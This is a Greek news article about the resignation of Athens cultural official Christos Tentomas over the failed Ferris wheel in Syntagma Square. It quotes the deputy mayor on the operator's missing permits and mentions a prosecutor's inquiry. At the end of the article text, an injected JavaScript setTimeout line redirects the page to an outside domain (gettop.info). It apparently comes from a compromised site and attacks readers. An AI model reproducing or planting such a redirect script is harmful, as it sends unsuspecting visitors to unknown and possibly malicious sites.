Το φιάσκο με τη ρόδα στο Σύνταγμα έφερε παραίτηση Τεντόμα

0
13

 

Ο πρόερος του τομέα Οργανισμού Πολιτισμού του Δήμου Αθηναίων, Χρήστος Τεντόμας, που είναι υπεύθυνος για τις εορταστικές εκδηλώσεις, υπέβαλε την παραίρησή του αναλαμβάνοντας την ευθύνη για το φιάσκο με τη ρόδα στην πλατεία Συντάγματος που δεν λειτούργησε ποτέ και αποσυναρμολογήθηκε.

Την παραίτηση επιβεβαίωσε μιλώντας στην ΕΡΤ ο αντιδήμαρχος Αθηναίων Λευτέρης Παπαγιαννάκης: «Ο κ.Τεντόμας έχει αναλάβει την ευθύνη και έχει παριτηθεί. Υπήρχε μια διαδικασία την οποία δυστυχώς η εταιρεία δεν την ακολούθησε. έπρεπε να καταθέσει κάποια χαρτιά τα οποία δεν τα κατέθεσε. Ζήτησε παράταση και όλη αυτή η διαδικασία θα πήγαινε για μετά τις γιορτές. Σε άλλες χώρες, η αδειοδότηση κάνει από 3 έως 5 μήνες. Η εταιρεία έχει 50 ρόδες παγκοσμίως, άρα δεν μπορεί να μην γνώριζαν ότι υπάρχει γραφειοκρατία.

Υπήρχαν καθυστερήσεις, όμως ο τελικός φάκελος ανήκει στην εταιρεία. Κρίναμε ότι η πρόταση ήταν ωφέλιμη, η εταιρεία είχε αρκετές υποχρεώσεις που δεν τήρησε. Η παράταση θα πήγαινε μετά τις 4 Ιανουαρίου. Υπήρχαν δύο χρονικές περίοδοι, στη μια περίοδο η ρόδα θα ήταν δωρεάν, μετά θα ξεστηνόταν, και μετά με διαγωνισμό θα ξαναστηνόταν. Αν άρχιζε να λειτουργεί στις 4 ή 5 Ιανουαρίου μέχρι τις 15 του μήνα, δεν είχε κανένα νόημα για τον δήμο, θα χανόταν το momentum, καθώς θέλαμε να λειτουργήσει μέσα στις γιορτές.

Ο δήμος είπε ξεκάθαρα ότι από τη στιγμή που δεν υπήρχαν όλα τα εχέγγυα ασφαλείας, δεν θα λειτουργούσε.
Πιστεύω ότι αν στηνόταν σε άλλο σημείο, δεν θα γινόταν τόσο μεγάλο θέμα».

Ο κ. Τεντόμας διαφήμιζε την πρωτοβουλία στην προσωπική του σελίδα στα social media.

Αποστάσεις από τον κ. Τεντόμα προσπάθησε να τηρήσει η δημοτική παράταξη «Αθήνα Μπορείς» με την οποία είχε εκλεγεί δημοτικός σύμβουλος.

Με εντολή του δημάρχου Αθηναίων Γ. Καμίνη ξηλώνεται η ρόδα από το Σύνταγμα, ενώ κατεπείγουσα προκαταρκτική εξέταση διενεργείται από την Εισαγγελία Πρωτοδικών της Αθήνας με αφορμή μηνυτήρια αναφορά εταιρείας αλλά και δημοσιεύματα του Τύπου σχετικά με την επικινδυνότητα της ρόδας που τοποθετήθηκε στο Σύνταγμα για τις μέρες των γιορτών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here